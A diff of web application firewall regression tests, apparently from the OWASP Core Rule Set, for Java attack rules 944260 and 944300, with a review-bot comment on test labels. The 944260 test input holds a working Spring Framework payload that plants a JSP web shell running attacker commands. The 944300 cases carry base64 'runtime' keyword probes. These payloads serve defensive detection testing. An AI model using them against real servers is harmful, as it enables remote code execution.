- data: "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
- output:
- log_contains: "id \"944260\""
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.1"
+ data: "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
+ output:
+ log_contains: "id \"944260\""
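Review bot: The description kept for the second test on the new side, `desc: "Spring Framework RCE"`, is less precise than the first test's `desc: "CVE-2022-22963"`, which names the advisory its payload reproduces; since this hunk drops the per-file `name:` key in favour of `rule_id:`, `desc` is now the only human-readable label a failing regression prints, so naming the advisory the second payload exercises alongside the short title would keep the two entries consistent and make triage quicker. The hunk also removes `enabled: true` from `meta` without a visible replacement; if the runner used that flag to skip whole files, it is worth confirming the new schema carries an equivalent (not visible in this diff). Both points are documentation-only; no request or expectation line in the hunk needs to change.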
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml
index 412a3b686..15685453b 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml
@@ -1,6697 +1,6366 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944300.yaml" description: "Positive tests for rule 944300" +rule_id: 944300 tests: - - test_title: 944300-1 + - test_id: 1 desc: "Argument test includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_id: 2 desc: "Argument name includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cnVudGltZQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cnVudGltZQ=test" + output: + log_contains: "id \"944300\"" + - test_id: 3 desc: "Cookie test includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cnVudGltZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cnVudGltZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 4 desc: "Cookie name includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cnVudGltZQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id 
\"944300\"" - - test_title: 944300-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cnVudGltZQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 5 desc: "Request header test includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cnVudGltZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cnVudGltZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 6 desc: "XML attribute value includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 7 desc: "XML element value includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_id: 8 desc: "Nested XML element value includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_id: 9 desc: "Content-Type text/plain includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_id: 10 desc: "Content-Type application/json arg value includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"cnVudGltZQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"cnVudGltZQ\"}" + output: + log_contains: "id \"944300\"" + - test_id: 11 desc: "Content-Type application/json arg name includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"cnVudGltZQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"cnVudGltZQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 12 desc: "Argument test includes keyword HJ1bnRpbWU" stages: - - stage: - input: - 
dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_id: 13 desc: "Argument name includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HJ1bnRpbWU=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HJ1bnRpbWU=test" + output: + log_contains: "id 
\"944300\"" + - test_id: 14 desc: "Cookie test includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HJ1bnRpbWU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HJ1bnRpbWU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 15 desc: "Cookie name includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HJ1bnRpbWU=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" 
+ Content-Type: "application/x-www-form-urlencoded" + Cookie: HJ1bnRpbWU=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 16 desc: "Request header test includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HJ1bnRpbWU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HJ1bnRpbWU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 17 desc: "XML attribute value includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 18 desc: "XML element value includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_id: 19 desc: "Nested XML element value includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: 
"OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_id: 20 desc: "Content-Type text/plain includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_id: 21 desc: "Content-Type application/json arg value includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HJ1bnRpbWU\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-22 + - input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HJ1bnRpbWU\"}" + output: + log_contains: "id \"944300\"" + - test_id: 22 desc: "Content-Type application/json arg name includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HJ1bnRpbWU\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HJ1bnRpbWU\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 23 desc: "Argument test includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"test=BydW50aW1l" - output: - log_contains: "id \"944300\"" - - test_title: 944300-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_id: 24 desc: "Argument name includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BydW50aW1l=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BydW50aW1l=test" + output: + log_contains: "id \"944300\"" + - test_id: 25 desc: "Cookie test includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
